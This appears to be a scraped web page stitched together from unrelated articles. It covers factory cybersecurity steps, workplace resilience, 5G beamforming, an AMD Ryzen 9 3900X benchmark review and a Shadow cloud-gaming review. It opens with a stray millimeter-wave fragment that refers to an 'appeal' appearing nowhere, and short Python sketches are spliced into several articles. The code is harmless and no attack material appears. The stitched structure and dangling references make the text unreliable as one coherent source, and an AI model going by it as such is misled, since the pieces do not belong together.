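As a quick back-of-the-envelope illustration (my own sketch, not from the appeal): the label “millimeter wave” comes directly from the free-space wavelength λ = c/f, which spans roughly 10 mm down to 1 mm across the 30–300 GHz range.

```python
# Sketch: why 30-300 GHz is called "millimeter wave" -- the free-space
# wavelength lambda = c / f falls between about 10 mm and 1 mm in that range.
C = 299_792_458.0  # speed of light in m/s

def wavelength_mm(freq_ghz: float) -> float:
    """Free-space wavelength in millimeters for a frequency given in GHz."""
    return C / (freq_ghz * 1e9) * 1e3

for f in (30.0, 52.6, 300.0):
    print(f"{f:6.1f} GHz -> {wavelength_mm(f):5.2f} mm")
```

At 30 GHz the wavelength is just under 10 mm; at 300 GHz it is about 1 mm, which is also why absorption stays so close to the body surface (skin and eyes).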

How to Protect Production Facilities Effectively in 2020

4 Ways To Defend Your Factory From Today’s Security Threats

Cyber Security Challenges: How to Protect Production Facilities Effectively in 2020

Cyber risks increasingly threaten industrial control systems and critical infrastructures. Securing these networks is a challenge for the industry as a whole. DFI Club offers a four-step solution.
Cyber-crime attacks cause hundreds of billions of dollars worth of damage worldwide every year.
That control systems and critical infrastructures are exposed to ever-increasing cyber risks is due, on the one hand, to a changed threat landscape with state-sponsored attackers and increasing spill-over effects and, on the other hand, to system-inherent factors, such as long lifecycles of often 20 to 30 years, which complicate protection. Securing these networks is a challenge for the entire industry and will certainly occupy it for the next decade. We have long been aware of the vulnerabilities, but have done little beyond paying lip service to closing them.
As is well known, every journey, no matter how long and arduous, begins with a first step. Companies that have been reluctant to take action to improve the security of their Operational Technology (OT) environment can take the following four steps to help them get started.
1. Identify the threat and communicate it forcefully in your business
Some time ago, the dangers were still abstract, and it would probably have been difficult to convince senior management of the risks involved. Today, given the Russian infiltration of US power plants and the highly visible effects of the WannaCry and NotPetya ransomware campaigns, this should be much easier. NotPetya alone caused hundreds of millions of dollars worth of damage and disrupted production at world-renowned companies.
2. Start a project to improve the security of your ICS network
One can assume that the threats to OT environments will continue to increase. It follows that the longer you wait, the greater the risk becomes. As we approach the fourth quarter of 2019, now is the time to plan and reserve budget for projects that will deliver rapid results in 2020, increasing motivation for further engagement. So first focus on practical, effective, short-term solutions that increase your preparedness.
3. Talk to your partners, suppliers and analysts
Meanwhile, many ICS equipment suppliers are working together with cybersecurity companies. The manufacturers of the equipment you use can help you and give you valuable information on what to focus on. Talk to colleagues, including competitors, and benefit from their experience. The time has come for a cross-company exchange, especially in view of the threat which ultimately affects everyone and which can only be countered together.
4. First, tackle the biggest challenges
The crucial basis for all further action is first finding out which assets are actually in use. That sounds banal, and most of those responsible will say they know exactly which devices are in their networks. However, our experience from hundreds of ICS scans tells a different story. Ultimately, you can only protect what you know. Accurately capturing all assets, including insight into how they communicate with each other, is therefore of paramount importance. Only those who know the normal state can quickly identify abnormal, conspicuous behavior, respond accordingly, and stop the accompanying threat.
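The baseline idea described above can be sketched in a few lines. This is a hypothetical toy example (asset names and traffic pairs are invented for illustration, not output of any real ICS tool): it flags communication pairs that never appeared in the known-good baseline.

```python
# Minimal sketch (hypothetical data): flag ICS traffic that deviates from a
# learned baseline of which assets normally talk to each other.
baseline = {                      # asset pairs observed during normal operation
    ("plc-01", "hmi-01"),
    ("plc-01", "historian"),
    ("plc-02", "hmi-01"),
}

observed = {                      # pairs seen in the current capture window
    ("plc-01", "hmi-01"),
    ("plc-02", "internet-host"),  # never seen before -> suspicious
}

def find_anomalies(observed, baseline):
    """Return communication pairs that are not part of the known-good baseline."""
    return sorted(observed - baseline)

print(find_anomalies(observed, baseline))  # [('plc-02', 'internet-host')]
```

Real OT monitoring products work on the same principle, only with far richer baselines (protocols, commands, timing), which is why the accurate asset inventory has to come first.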
These four measures should help all operators of production facilities and critical infrastructures to become more secure. Of course, they can and should be supplemented by their own requirements. Above all, it is important to put them into action. We should stop discussing whether the threat is real and finally address it before it’s too late.

Healthy Employees Manage Digital Transformation Better

Many companies have broken up their once-rigid hierarchies in favor of agile project structures. Many employees cope well with the associated dynamics. Others get stressed and become ill. To prevent this, companies should work on their corporate resilience. But what exactly is that, what does resilience mean, and why does it matter?

Why is resilience at work important, how do you develop it, and how do you build corporate resilience?

Why one employee blossoms under the same dynamic conditions while another becomes ill is a question resilience research has been investigating for several years. The term resilience means bouncing back or rebounding. It was introduced into psychology by the American scientist Emmy E. Werner. In her long-term study, she spent over 40 years observing the development of 698 children on the Hawaiian island of Kauai. One third of them came from difficult circumstances. Within the entire cohort born in 1955, she found that a third of that 30 percent showed particular resilience despite their poor starting conditions: they developed into mentally healthy, stable, capable and happy adults. Based on these observations, resilience research has developed approaches to help people cope better with stress. Today, resilience is defined not as an innate personality trait but as the result of an interaction process between a person and his environment. Psychology also knows that the development of resilience depends on protective factors that a person can access and make use of. In children, for example, these include parents or, if they fail, caregivers such as teachers or friends who provide social stability and orientation. In addition to education, these caregivers must give a child a sense of attachment and security, as well as open up social spaces in which to develop his personality and gifts. If these caregivers and protective factors are lacking, or if a young person does not use them, he can hardly escape his fate.

Number of Mental illnesses Increases

The findings of Emmy E. Werner and the work of the numerous scientists worldwide who founded modern resilience research can also be put to good use in an entrepreneurial context. The digital transformation, information overload, restructuring as a permanent state, ever-shorter innovation cycles, and the generally lamented work compression create stress for many workers. In uncertain times, disruptive changes cause stress, as does destructive communication, not to mention the “always on” mentality. Boards and management have a responsibility for the mental health of their workforce and should interpret the signals correctly. In Germany, mental illnesses increased significantly from 2007 to 2017; since 1997 they have even tripled, as the DAK Psychoreport reported in July 2019. Although there has been a slight downward trend since 2018, 2.2 million people were affected. The resulting economic costs have skyrocketed in parallel and now stand at 33.9 billion euros. In addition, the Federal Pension Fund approved more than 170,000 inpatient rehabilitations for mental illnesses in 2018, over 50,000 more than ten years earlier. Even if these figures seem negligible given Germany’s 40 million workers, employers and managers would be wrong to dismiss them, because illnesses and disproportionately increased costs are only the visible sign of a broader development.

Seven Factors of Resilient People

But stress is not always, and not for every person, the cause of a disease. All people have more or less pronounced resilience factors that enable them to cope with stress. From numerous empirical studies, the US scientists Dr. Karen Reivich and Dr. Andrew Shatté of the University of Pennsylvania identified in 2003 seven factors that characterize resilient people:

1. Emotion regulation. Resilient people keep their emotions under control.

2. Impulse control. Those who control their impulses can think clearly, plan, act with foresight and achieve their goals. Both abilities are important above all in permanent change processes, in order to cope with the conflicts that often accompany them. A manager keeps his nerve when he has to delegate responsibility in agile project structures, and on this basis a project manager can give clear instructions.

3. Causal analysis. A resilient person recognizes causal relationships, classifies them in terms of content, and communicates his expectations comprehensibly to his colleagues.

4. Self-efficacy. When a person is committed and self-confident, he tackles challenges he has never faced before. This competence is especially important in times of radical upheaval.

5. Realistic optimism. For such personalities, the glass is half full; they hold up in difficult situations because they always see the positive possibilities and actively pursue them. Especially in companies breaking new ground with digitization, such employees are a win.

6. Goal orientation. This factor is vital in times of uncertainty to compensate for the stress that often accompanies them. Goal orientation distinguishes personalities who consistently pursue their goals even when their environment puts obstacles in their way. This entrepreneurial ability is especially necessary in flat hierarchies and agile project structures, where responsibility is delegated to teams that also have to make decisions.

7. Empathy. Perhaps the most important skill for executives is the gift of empathizing with another person. Empathic leaders can understand the emotional situation of their employees and respond appropriately. A project manager who understands the disappointment of an overburdened employee who has to give up tasks can explain the reasons and give tips on how the person can improve.

Resilience Competence Can Be Built

Of course, hardly any leader combines all factors equally well in his personality. But the most hopeful insight of current resilience research and practice is that resilience can be learned and, much like fitness in sports, built up. Resilience is not a static toolbox of personal characteristics or positive environmental factors; it is a variable, multi-dimensional process that, as in sports, is ideally developed continuously. By providing protective factors such as coaching or training on a regular or on-demand basis, people can strengthen their personal resilience to stress. For companies, this means they should analyze the resilience constellations at management levels, in departments and in teams. This opens up completely new intervention and training approaches for developing the resilience competences of managers and employees, shifting the focus, as in developmental psychology, from pathogenesis to salutogenesis. This health research approach asks not only what has made someone sick or is about to, but above all what can keep him healthy. This preventive approach of occupational health management therefore seeks to strengthen an employee’s strengths rather than merely work on deficits. The linchpin here is the management, from the board to the C-level.

Corporate Resilience is a Management Task

Corporate resilience cannot be separated from the personal resilience of individual managers. Rather, it is a task that should start with the executives. After all, they serve as role models and are sometimes themselves the source of burdens. They must therefore first question their own leadership behavior and explore their own resilience skills, for example along the seven factors of Reivich and Shatté. They should be aware that their interaction with employees and their communication behavior have an immediate impact. For example, a project manager who sends instructions at midnight or during vacation creates a real stress situation for the team that evening and in the office the next day. Such leadership is undesirable in successful companies today. Managers have to live up to their role-model function and orient their behavior towards the basic mental health needs of their employees. At the same time, an occupational medicine or work, industrial and organizational psychology (ABO-Psych) analysis helps identify structural, personal and organizational causes of mental stress in the workforce. ABO office hours, in which employees can confide in a psychologist under confidentiality, have also proven their worth. Such external psychologists have the advantage of being able to hold up a mirror to executives through anonymized reports. This often makes it possible to show a manager his less resilient leadership approach and to help him work on his behavior. In addition to ABO psychologists, so-called resilience checks have proven themselves. These record the daily workloads of individual employees using questionnaires as well as a 48-hour measurement of their vital data with a simple electronic sensor patch. After evaluation, the participants receive individual advice with recommendations on how to better handle and reduce their personal stress.

Combining Corporate and Error Culture with Resilience-building

But corporate resilience cannot be ordered by decree. It should be understood as a process, and it does not succeed immediately just because the board and managers, prompted by a resilience check, work on themselves. Also necessary is taking stock of the mindset of the corporate culture. Companies that want to strengthen their resilience to disruptive long-term change, and work more agilely in flat hierarchies to respond more quickly to market demands, must also revise their way of dealing with errors. In doing so, they can learn from start-ups, which often achieve their breakthrough only through failed attempts and their will to succeed. Such an error culture ideally leads to a continuous learning process. This requires a mindset of openness, transparent communication, and a willingness to recognize the causes of errors, fix them, and share this learning curve within the company. This not only raises the quality level in the long term but also employee satisfaction. Employees experience themselves as self-effective, can constructively solve problems and conflicts, and emerge strengthened from disruptive change processes.

Corporate Resilience As A Corporate Goal

Since corporate resilience is a permanent process, it belongs among the corporate goals. It should be anchored as a strategic initiative with the necessary resources throughout the company, and developed into a permanent cross-cutting theme. On the one hand, it should be regularly on the agenda of every department or team meeting. On the other hand, board members should not send their executives unprepared into new, excessive demands; it is important to prepare them, for example through in-house seminars and personal counseling services. On this basis, executives decide what resources they need: from ABO psychologists to resilience checks to individual coaching or team supervision, the toolbox offers plenty of scope. And if the costs of resilience measures seem too high, HR managers can play the demographics card in addition to the arguments already mentioned: in the face of an aging society and a shortage of skilled workers, especially in the STEM professions, it is crucial to keep older employees in working life longer and healthier. Curbing staff turnover also benefits a company, as turnover has been shown to correlate with employee satisfaction.

Conclusion: Corporate Resilience pays off for Companies & Employees

Why is resilience important in business?

Employee satisfaction increases in parallel with corporate resilience, and resilience to change in the workplace is now a must-have trait in business. If employees experience their job as meaningful, feel comfortable in their department and with their colleagues, and find their boss balanced, confident, communicative and loyal, they are ill less often. A satisfied employee is absent on average only 9.4 days per year. Employees who feel constantly stressed, and for whom the overall working climate is not right, are absent up to 19.6 days per year. In this respect, healthy employees manage the burdens of digital transformation better. Improving corporate resilience pays off twice: economically and for the employees.


Resilience and Agility are two top skills needed in Today’s Workplace.

Beamforming 5G – Mobile Radio With Pinpoint Accuracy

Time has come for mobile operators to use beamforming and achieve even better performance in mobile communications.

In beamforming, an active antenna emits 64 signals in parallel, all of which are individually controlled and aimed at customers.

Beaming is something some of us know from the legendary line in the science fiction series: “Beam me up, Scotty!”

While it is still not possible to beam people or objects as on the USS Enterprise, the word “beam” really does lead the way when it comes to beamforming: targeted mobile radio beams are one of the most important technologies of the future 5G network. The technique is fascinating.

What is Beamforming?

Nobody can answer this question better than Sebastian Gunreben, 5G Integration Manager at Deutsche Telekom. He explains: “Beamforming is the next step after MIMO.”
As a reminder: in 4×4 MIMO, a kind of all-wheel drive for the mobile network, four transmit antennas on the mast and four receive antennas in the terminal provide about 60 percent faster surfing, raising the previous maximum LTE speed of 300 megabits per second (Mbps) to 480 Mbit/s.
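A quick sanity check of the figures quoted above: 60 percent on top of 300 Mbit/s does give the stated 480 Mbit/s.

```python
# Check the article's arithmetic: LTE peak plus "about 60 percent" with 4x4 MIMO.
lte_max_mbps = 300
gain_percent = 60

mimo_mbps = lte_max_mbps + lte_max_mbps * gain_percent // 100
print(mimo_mbps)  # 480
```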
Beamforming takes up this principle but multiplies it by a factor of 16: here an active antenna emits 64 signals in parallel, all of which can be individually controlled and aimed at customers. “These are 64 receive and transmit elements that form 64 different beams.”
Instead of broadcasting a mobile radio signal in a circle, which becomes weaker and weaker toward the edge, beamforming, i.e. the “shaping of beams”, aligns the signals in the form of elongated lobes. With such a beam, the signal at the edge of the cell is similar in strength to the signal at the center.

However, the antennas do not move. “The beam is formed by a phase shift of the signal and multipath propagation – the antenna itself remains static.” The beams are formed fully automatically, so the transmission power can be adjusted as needed, ensuring optimal coverage for each user.
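The quoted mechanism, steering a beam purely by phase-shifting the signal at each static antenna element, can be sketched for an idealized uniform linear array. This is a simplified textbook model under stated assumptions (half-wavelength element spacing, lossless elements), not Telekom's implementation: each element n gets a phase offset proportional to n and to the sine of the steering angle, and summing the element responses shows the array factor peaking in exactly the steered direction.

```python
import math

# Sketch: a beam is steered electronically by giving each antenna element a
# phase offset, not by moving the antenna. For a uniform linear array with
# element spacing d = lambda/2, the phase for element n when steering to
# angle theta is: phi_n = -2*pi*n*(d/lambda)*sin(theta).

def steering_phases(n_elements: int, theta_deg: float, d_over_lambda: float = 0.5):
    """Per-element phase offsets (radians) that steer the beam to theta_deg."""
    theta = math.radians(theta_deg)
    return [-2 * math.pi * n * d_over_lambda * math.sin(theta)
            for n in range(n_elements)]

def array_gain(phases, theta_deg: float, d_over_lambda: float = 0.5) -> float:
    """Magnitude of the array factor in direction theta_deg."""
    theta = math.radians(theta_deg)
    total = 0j
    for n, p in enumerate(phases):
        # geometric path-length phase of element n plus its applied offset
        arg = p + 2 * math.pi * n * d_over_lambda * math.sin(theta)
        total += complex(math.cos(arg), math.sin(arg))
    return abs(total)

phases = steering_phases(8, 30.0)   # steer an 8-element array to 30 degrees
print(round(array_gain(phases, 30.0), 2))  # 8.0 -- all elements add coherently
print(round(array_gain(phases, 0.0), 2))   # 0.0 -- a null away from the beam
```

The same principle scales to the 64-element antennas described in the article; the antenna stays static, and only the per-element phases change to move the lobe.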

With the new technology, no Telekom employee sits under the antenna directing the beams at individual customers; that happens fully automatically. The transmission power is adjusted as needed and provides optimal coverage for each individual user.
Someone making a phone call, which requires few resources, is covered by a suitable beam just like a customer who is streaming a video at a high data rate. The result: mobile communications tailored to demand. The horizontal and vertical alignment of the new active antennas also increases coverage, especially in urban areas with tall buildings. Incidentally, beamforming is also used in WLAN.

How fast is 5G beamforming?

So far, the new technology is running not out in the wild but in the lab. “There, of course, we have perfect conditions and get several gigabits per second,” the 5G specialist reveals.
In the real world, the beams will make sure we get close to these lab values, and at some point we will achieve similar data rates. Deutsche Telekom’s customers can therefore look forward to real gigabit mobile communications.

What happens if there are more than 64 users in a cell?

One of the most important principles of beamforming: “The 64 lobes or beams are not each aimed at a single user; rather, each ultimately forms a local lobe. That means several customers can be served within one beam, depending on what network resources they request.”

A good example is a tourist group standing in front of the Eiffel Tower taking selfies. Its members are all captured and served by the same beam. But whoever uploads photos to Instagram via 5G needs, and receives, a higher data rate than the fellow tourist next to him who is only calling home.

This is the crucial difference between a passive mobile phone antenna and the new beamforming.

“The antenna performance remains more or less the same compared to a conventional antenna, but the previous antenna always transmits at the same power, around the clock. With beamforming, I can call up this performance only when there really is a need in this cell.”

Is gigabit speed the main advantage of beamforming?

Speed is one thing, but the higher network coverage through the new technology is even more important. “With a static antenna, we have a certain propagation field, so at the edge of the network it may be that we cannot get high data rates anymore or that the service does not work for a user.”

The active antenna, on the other hand, “sees” when a user is at the edge of the network and specifically directs a beam at him. “As a result, we are suddenly no longer at the edge of the network but within a beam.” This gives customers higher data rates, and the services work.

Beamforming Advantages and Disadvantages:

Here are the benefits of beamforming:

  1. The main principle of this technology is the biggest advantage and that is boosting the power of beams in the desired direction to serve the farthest subscribers in a best way by reaching them to telecom cell towers or base stations. This increases supporting capacity of a cellular tower in terms of number of subscribers.
  2. The RF signal can overcome noisy and attenuating channel environments, because 5G beamforming increases the signal's C/N ratio. This extends the coverage of the cell tower or base station.
  3. Owing to its immunity against fading and interference, it is widely used together with MIMO in the latest wireless technologies, e.g. Mobile WiMAX (IEEE 802.16e), LTE, LTE-Advanced and 5G.

There are also shortcomings or disadvantages of beamforming:

  1. The setup uses multiple RF antennas, which makes the hardware more complex.
  2. The beamforming system relies on advanced, high-throughput DSP chips, so it consumes more power.
  3. For the same reasons, a beamforming system costs more than a non-beamforming system.

AMD Ryzen 9 3900X Stress Test Results – Incredible Performance Show


AMD Ryzen 9 3900X in the test showed incredible performance

Conclusion of Test:

AMD's Ryzen 9 3900X turns out to be a wonder CPU in our test. The twelve-core processor beats the direct competition in many tests with flying colors, is efficient, and at the same time only slightly more expensive. With that, Intel's last stronghold, the consumer high end, has fallen too. Whether you are a gamer or a high-end user, there is little reason not to reach for the 3900X.


  • +Strong single and multi-core performance
  • +High efficiency
  • +Compatible with old motherboards


  • -No integrated graphics unit
  • -A bit expensive

Test scores (compared to all tested products in this category)

Maximum power dissipation (TDP): 105 watts
Processor Clock: 3.80 GHz
Benchmark: x264: 150.26 fps
Number of CPU cores: 12
Base type: Socket AM4
Number of threads: 24
Level 2 cache: 12x 512 kByte
Level 3 cache: 65,536 kByte
Core Code Name: Matisse
Manufacturing process: 7 nm
Product: AMD Ryzen 9 3900X
Benchmark: PovRay, 1.280×1024, no AA: 6,174 pixels / s
Benchmark: TrueCrypt 7.2 AES Twofish Serpent: 979 MB / s
Maximum processor clock: 4.60 GHz
Integrated graphics unit: no onboard GPU
CPU performance: 1.4
Benchmark: HandBrake: 206.9 fps
Benchmark: Cinebench R15, max. Num. CPUs: 3,130 points
Graphic Benchmark: Bioshock Infinite: 0.00 fps
Benchmark: WinRAR: 27,823 KB / s
Benchmark: 3DMark Time Spy with GTX 1080: 8,143 points
GPU performance: 7.5
Benchmark: Excel 2016 – Monte Carlo Simulation: 0.45 seconds
Benchmark: PCMark 8: 4,153 points
Benchmark: 3DMark Firestrike with GTX 1080: 20,220 points
Graphics Benchmark: 3DMark Time Spy: 0 points
Graphic Benchmark: Metro Last Light: 0.00 fps
Graphics Benchmark: 3DMark Cloud Gate: 0 points
Graphics Benchmark: 3DMark Firestrike: 0 points

AMD Ryzen 9 3900X in Test: 


It's in moments like these that we look at test results with extremely mixed feelings. On the one hand, our eyes glow when we get to experience a revolution live: the AMD Ryzen 9 3900X beats its direct competitor, the Intel Core i9-9900K, in our benchmarks by an average of 21 percent, and it is barely more expensive. On the other hand, one thought kept nagging us: "That can't really be."

Well, it can be, and it is – we re-tested the i9-9900K with the latest updates, and in the end it draws the short straw. We want to try to explain how AMD did that. But first, a few words about the basic structure of the new Zen 2 microarchitecture and the benchmark results.

Turning One into Three

With Zen 2, aka "Matisse", AMD says goodbye to the old single Zeppelin die and splits the tasks across several parts: there are three components on the silicon of the R9 3900X. Two of them are so-called chiplets, home to the Ryzen's cores – up to eight per chiplet, organized in clusters of four. The CPU-near cache also lives in the chiplets. Both chiplets communicate with the I/O die ("I/O" stands for input/output) via the "Infinity Fabric" data bus, which in turn handles data transfer to the rest of the PC, memory management, and communication between the chiplets.


Test Item              AMD Ryzen 9 3900X    Intel Core i9-9900K
PCMark 8               4,153 points         4,152 points
PCMark 10              4,194 points         3,783 points
Excel                  0.448 sec            0.41 sec
Cinebench R15          3,130 points         2,033 points
Cinebench R20          7,111 points         4,912 points
Cinebench R20 (ST)     501 points           511 points
WinRAR                 27,823 KB/s          25,476 KB/s
HandBrake              206.9 FPS            157.51 FPS
x264                   150.26 FPS           120.31 FPS
x265                   14.107 FPS           10.156 FPS
POV-Ray                6,174.2 points       4,272.93 points
TrueCrypt              979 MB/s             697 MB/s
Fire Strike            20,220 points        19,899 points
Time Spy               8,143 points         7,681 points

Ryzen 9 is not Heavy on Power

A typical way to get more performance out of a CPU is to let it draw more power. In our measurements, however, there is hardly any difference between the top CPUs from AMD and Intel. In PCMark 10, system power consumption of the AMD machine comes to 234 and 350 watts, depending on the test scenario; the Intel system comes to a marginally lower 233 and 348 watts. Even allowing for the different motherboards and their possibly different consumption, the differences between the processors are negligible. So AMD's lead does not come from simply burning more power.

The Secret is in the IPC

There is one big difference between AMD and Intel: clock speed. While Intel has cracked 5 GHz, the Ryzen's boost only reaches 4.6 GHz. The stronger performance can therefore only come from a massively improved IPC (instructions per cycle). AMD names a number of changes that together are said to contribute the additional 15 percent IPC the manufacturer specifies over the previous generation.
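Using the single-thread numbers from the benchmark table above, a back-of-the-envelope calculation illustrates the per-clock gap (points per GHz as a crude IPC proxy; this is our arithmetic, not AMD's methodology):

```python
# Cinebench R20 single-thread scores and boost clocks from the review's table.
amd_score, amd_clock_ghz = 501, 4.6      # Ryzen 9 3900X
intel_score, intel_clock_ghz = 511, 5.0  # Core i9-9900K

# Points per GHz: a rough stand-in for work done per clock cycle.
amd_per_ghz = amd_score / amd_clock_ghz        # ~108.9
intel_per_ghz = intel_score / intel_clock_ghz  # ~102.2

advantage = amd_per_ghz / intel_per_ghz - 1
print(f"AMD per-clock advantage: {advantage:.1%}")  # "AMD per-clock advantage: 6.6%"
```

Despite scoring slightly lower in absolute single-thread terms, the Ryzen does measurably more work per clock, which is consistent with AMD's IPC claims.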

The most obvious is the enlarged L3 cache: 64 MB of CPU-near memory is now available. The improved AVX2 support is also exciting – the CPU now processes 256-bit AVX2 instructions at full width, twice as fast as before. Furthermore, the chip improves branch prediction, gets a larger micro-op cache, and a more associative L1 cache.

The last two improvements are a little easier to picture. The first is thread grouping: processor threads, i.e. the tasks of running programs, end up in Zen 2 in the same chiplet and, within it, preferably in the same compute cluster, instead of at opposite ends of the processor. This is a better arrangement, especially given the physically separated chiplets.

On the Subject of Memory:

AMD has given the Infinity Fabric, the CPU's data bus, more freedom in its clock. That should remove an old bottleneck – but according to AMD, there is a "sweet spot" at DDR4-3733. Those who want to save a bit of money without significant performance losses can reach for DDR4-3600 (CL16). Unfortunately, we were not able to test how different data rates affect performance.

Ultimately, one thing should not be forgotten when judging CPU performance: AMD dispenses with an integrated graphics unit in its higher-end desktop processors. If Intel omitted its iGPU, more die space would be available for CPU tasks – though an integrated graphics unit can also bring significant advantages in some benchmarks.

Blade Shadow Cloud Gaming Review


Shadow cloud gaming, in a nutshell, means renting instead of buying.


The cloud gaming service Shadow leaves a promising impression in our test: without having a gaming computer at home, you can play current PC video games in great quality - both on an underpowered work machine and on a mobile device. Even competitive online games like Fortnite or Overwatch are quite playable. Operation and setup are also very easy. The monthly costs seem high at first glance but can pay off compared to owning a gaming PC. Our criticism is mainly about smaller missing features, plus general concerns about the cloud approach - though those apply equally to any other service in the data cloud.


  • +Hardly a difference to a gaming PC.
  • +Good hardware.
  • +Extremely fast downloads and uploads.


  • -Occasionally framedrops and delays
  • -Games must be bought separately
  • -Price only pays off in comparison to an expensive gaming computer
You can be jealous: friends and acquaintances are playing the latest games like Call of Duty: Black Ops 4 or Assassin's Creed Odyssey in glorious detail, and you are left behind because your computer lacks the necessary hardware. But why buy if you can rent? Blade's cloud gaming service "Shadow" replaces the beefy gaming computer or the annual hardware upgrade. We tested Shadow and can report promising results. However, there are also some weaknesses that cloud the gameplay experience.

What is Shadow?

"Cloud gaming" is a term you now find more often in the online world. In addition to Nvidia (GeForce Now), Blade offers the service "Shadow". But what exactly does cloud gaming mean? Instead of having all the hardware you need to play at home, you rent a computer with high-end hardware in Shadow's data center in Amsterdam. All you need locally is a device capable of video decoding. You connect from, say, your home computer, which captures the input from mouse, keyboard and controller, while the high-end computer at the other end of the line streams back the rendered result as video. The only prerequisite is a bandwidth of at least 15 Mbit/s. Beyond that, it does not matter what hardware your own computer has.

To set up Shadow, you first create an account on the Shadow page. Note that there are two subscription models: €39.95 per month, or €29.95 per month with a 12-month subscription. After setting up your account, you download the Shadow app. It offers several options, but most settings should adapt automatically to your system. After connecting to your rented computer, you set up Windows 10 on the remote machine. Then you are on your full-fledged cloud computer.

This is best regarded as a new computer whose screen is delivered as a kind of video stream to your local machine. Especially in full-screen mode, you forget that you are remotely controlling another computer. You can use the machine not only for gaming but for all the other purposes of a high-end computer - from simple office work to professional video editing.

Inside the Shadow computer works an Intel Xeon processor with 12 GB of RAM, an Nvidia Quadro P5000 (comparable to a GTX 1080), 256 GB of storage (expandable by 1 TB), and a download bandwidth of up to 1 Gbit/s. These components ensure that even graphically demanding games run smoothly. In addition, according to Blade, the hardware is constantly renewed.

Depending on the bandwidth, Shadow offers streaming with Full HD resolution at 144 Hz or 4K resolution at 60 Hz. The subscription also includes a loan of the Ghost streaming console, which you can easily connect to your TV via HDMI.

What Can Shadow Do?

Operating Shadow is very simple, and the app is very tidy. A simple shortcut (Ctrl + Win + F) switches between windowed and full-screen mode. In full screen, the surface is indistinguishable from a normal computer - apart from the fact that you are not an unrestricted admin and, for example, get no access to the Task Manager. In windowed mode, you can simply move the mouse cursor over to the other applications on your home computer; no cumbersome keyboard shortcuts are needed to free the pointer from the Shadow window.

In addition to the Windows app, there are versions for macOS and Ubuntu (beta). Another advantage is the seamless transition to mobile devices: you can simply continue using Shadow on your smartphone. For mobile use, however, keep an eye on your data volume - or better, connect to Wi-Fi right away.

The app runs smoothly on Android, but iOS causes some complications. According to Shadow, you have to enter your Apple ID on the account page to receive an invitation to "TestFlight" by e-mail (note: TestFlight is an online service for testing mobile applications), because at the time of our test there was no Shadow app in the App Store yet. In our test this did not work: the process got stuck at the invitation mail, which never arrived.

Games are Impressive

For our gaming test we used an office computer with mediocre hardware (Intel Core i7-5600U, 16 GB RAM) and no dedicated graphics card. The internet connection was a 100-Mbit line; the client usually detected a bandwidth of just over 50 Mbit/s. After setup, we installed various games on our Shadow computer. Thanks to the roughly 1 Gbit/s maximum download rate, games install quickly - although we rarely saw more than 100 MB/s on distribution platforms such as Steam or Battle.net.

The good news: many single-player games are hardly a problem for the system. GTA V and Far Cry 5 run at full-HD resolution on highest settings at around 90 frames per second. In Doom (2016) and Deus Ex: Mankind Divided we also averaged over 110 FPS at very high details in this resolution. Short frame drops occurred, but we did not perceive them as particularly bad. We also put the system through the 3DMark Time Spy Extreme benchmark. The resulting 2,566 points match our expectations: the combination of Nvidia Quadro P5000 and Intel Xeon E5-2667 makes a great full-HD PC but a rather poor 4K machine. 3DMark puts the average gaming PC at 3,365 points.

While playing, stutters or latency problems were rare - with one exception: around closing time (5:30 p.m.) on one test day, Doom (2016) stuttered so badly that it became unplayable, although the system showed no FPS drops. We suspected the connection and increased service load at the time. Interestingly, we noticed no such stuttering when switching to other games, and on other days and at other times the problem did not reappear, so in the end we cannot explain the effect. Regardless, there is always the possibility of quality restrictions during periods of high service load.

Online Gaming Quality:

We were also interested in online gaming performance, because on top of the streaming-induced input delay comes the latency of communicating with the game servers. For this we installed several online games that demand fast reactions, where even the smallest latency becomes a disadvantage.
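The components of that delay can be sketched as a simple budget; all of the per-stage values below are illustrative assumptions for a cloud-gaming setup, not measurements from our Shadow test:

```python
# Illustrative end-to-end latency budget for one player input in cloud gaming
# (stage values are assumptions for illustration, not measured Shadow data).
budget_ms = {
    "input capture + uplink": 5,
    "cloud render + encode": 15,
    "video downlink": 10,
    "decode + display": 10,
}
streaming_ms = sum(budget_ms.values())  # extra delay added by streaming alone

game_server_ping_ms = 21  # e.g. the League of Legends ping we measured
total_ms = streaming_ms + game_server_ping_ms
print(total_ms)  # 61 -> well above the 21 ms server ping alone
```

Even with optimistic assumptions, the streaming pipeline adds a constant overhead on top of the server ping, which is why twitch-reaction games feel the difference first.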

League of Legends:

  • Very high graphics settings: average 100 FPS, 21 ms ping
  • Frequent input lag
  • Extreme FPS Drops

Call of Duty: Black Ops 4

  • Very high graphics settings: on average 100 FPS
  • Some input lags
  • Partial FPS Drops


  • Epic graphics settings: average 60 fps, 8 ms ping
  • High graphics settings: average: 100 FPS
  • Frequent sound lags
  • Partial FPS Drops
  • No input lag, very smooth gameplay


  • Epic graphics settings: an average of 98 FPS
  • No FPS drops
  • Hardly input lag, very smooth gameplay

In conclusion, online games where every millisecond counts cannot be fully recommended on a cloud machine. Above all, it is very annoying when the connection is stable for a while and then, in an important team fight, lag and stutter suddenly appear and ruin a crucial maneuver. If you play more relaxed online games, you should not encounter any problems.

Are the Costs Worth It?

Around 30 euros a month - that is, 360 euros a year - for a rented computer sounds like a lot. Depending on how you calculate, though, you come out cheaper than with a real PC. For a sample calculation, we take a relatively cheap high-end complete PC for 2,000 euros with an Nvidia RTX 2070, Intel Core i7-8700, 16 GB of RAM and generous SSD and hard-disk space: the Acer Predator Orion 3000.

If you assume you will not replace a single component of this PC for five years, the machine costs you around €33 a month - before electricity costs. From six years onward without component replacement, however, your own gaming PC would pay off.
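The sample calculation can be written out explicitly (the article's prices, with electricity ignored as in the text):

```python
# Break-even sketch for the article's sample calculation.
pc_price_eur = 2000           # Acer Predator Orion 3000
shadow_eur_per_month = 29.95  # Shadow's 12-month subscription price

def pc_cost_per_month(years):
    """Amortized monthly cost of the PC over the given lifetime."""
    return pc_price_eur / (years * 12)

print(round(pc_cost_per_month(5), 2))  # 33.33 -> Shadow is cheaper over 5 years
print(round(pc_cost_per_month(6), 2))  # 27.78 -> own PC pays off from ~6 years
```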

Defects and Criticism

In our test we used the somewhat unusual screen resolution of 1,900 x 1,200 pixels - and it was not possible to make Shadow accept this setting. Neither in the app, nor in the Windows settings, nor in the Nvidia control panel could the resolution be adjusted, so our test picture had ugly black bars. Multi-monitor setups are also not yet supported, but this feature is said to be under development.

On privacy: Shadow promises that data is processed and analyzed only minimally. Nevertheless, we would not recommend storing personal information on a cloud machine; in particular, you should refrain from banking transactions or storing sensitive data.

